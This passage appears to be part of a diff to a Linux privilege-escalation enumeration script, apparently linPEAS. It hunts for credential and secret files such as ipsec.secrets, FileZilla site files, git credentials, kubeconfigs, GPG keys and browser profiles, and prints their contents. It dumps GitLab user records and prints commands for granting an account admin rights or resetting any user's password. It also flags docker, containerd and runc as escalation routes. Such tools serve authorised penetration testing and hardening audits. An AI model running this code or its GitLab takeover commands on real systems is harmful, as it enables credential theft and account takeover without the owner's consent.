+ if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Erlang Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing GMV Auth Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing IPSec Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing IRSSI Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Keyring Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_FILEZILLA" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Filezilla Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Backup Manager Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo "";
+fi
+
+
+##-- SI) passwd files (splunk)
+SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
+if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then
+ print_2title "Searching uncommon passwd files (splunk)"
+ if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
+ printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do
+ if [ -f "$f" ] && ! [ -x "$f" ]; then
+ echo "passwd file: $f" | sed "s,$f,${SED_RED},"
+ cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
+ fi
+ done
+ echo ""
+fi
+
+if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing kcpassword files"
+ print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
+ printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do
+ echo "$f" | sed -${E} "s,.*,${SED_RED},"
+ base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ done
+ echo ""
+fi
+
+##-- SI) Gitlab
+if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then
+ print_2title "Searching GitLab related files"
+ #Check gitlab-rails
+ if [ "$(command -v gitlab-rails)" ]; then
+ echo "gitlab-rails was found. Trying to dump users..."
+ gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
+ echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
+ echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
+ echo ""
+ fi
+ if [ "$(command -v gitlab-backup)" ]; then
+ echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
+ echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
+ echo ""
+ fi
+ #Check gitlab files
+ printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
+ if echo $f | grep -q secrets.yml; then
+ echo "Found $f" | sed "s,$f,${SED_RED},"
+ cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#"
+ elif echo $f | grep -q gitlab.yml; then
+ echo "Found $f" | sed "s,$f,${SED_RED},"
+ cat "$f" | grep -A 4 "repositories:"
+ elif echo $f | grep -q gitlab.rb; then
+ echo "Found $f" | sed "s,$f,${SED_RED},"
+ cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
+ fi
+ echo ""
+ done
+ echo ""
+fi
+
+if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Github Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_SVN" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Svn Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing PGP-GPG Files (limit 70)"
+ ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null
+ ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null
+ (command -v netpgp || echo_not_found "netpgp") 2>/dev/null
+ if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Cache Vi Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_WGET" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Wget Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
+fi
+
+
+##-- SI) containerd installed
+containerd=$(command -v ctr)
+if [ "$containerd" ] || [ "$DEBUG" ]; then
+ print_2title "Checking if containerd(ctr) is available"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation"
+ if [ "$containerd" ]; then
+ echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
+ ctr image list 2>&1
+ fi
+ echo ""
+fi
+
+##-- SI) runc installed
+runc=$(command -v runc)
+if [ "$runc" ] || [ "$DEBUG" ]; then
+ print_2title "Checking if runc is available"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation"
+ if [ "$runc" ]; then
+ echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
+ fi
+ echo ""
+fi
+
+#-- SI) Docker
+if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then
+ print_2title "Searching docker files (limit 70)"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation"
+ printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do
+ ls -l "$f" 2>/dev/null
+ if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
+ echo "Docker related socket ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ fi
+ done
+ echo ""
+fi
+
+if [ "$PSTORAGE_KUBERNETES" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Kubernetes Files (limit 70)"
+ (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBERNETES|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED},"
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubeconfig$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet-kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet-kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet-kubeconfig$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,kubelet-kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "psk\.txt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"\.kube.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".kube*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "\.kube.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.kube.*$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "kubelet.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubelet.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kube-proxy$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,kube-proxy$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,kubernetes$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Firefox Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Chrome Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Autologin Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo "";
+fi
+
+
+#-- SI) S/Key athentication
+if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then
+ print_2title "S/Key authentication"
+ printf "System supports$RED S/Key$NC authentication\n"
+ if ! [ -d /etc/skey/ ]; then
+ echo "${GREEN}S/Key authentication enabled, but has not been initialized"
+ elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
+ echo "${RED}/etc/skey/ is writable by you"
+ ls -ld /etc/skey/
+ else
+ ls -ld /etc/skey/ 2>/dev/null
+ fi
+fi
+echo ""
+
+#-- SI) YubiKey athentication
+if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then
+ print_2title "YubiKey authentication"
+ printf "System supports$RED YubiKey$NC authentication\n"
+ if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
+ echo "${RED}/var/db/yubikey/ is writable by you"
+ ls -ld /var/db/yubikey/
+ else
+ ls -ld /var/db/yubikey/ 2>/dev/null
+ fi
+ echo ""
+fi
+
+if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing SNMP Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Pypirc Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Postfix Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Ldaprc Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Env Files (limit 70)"
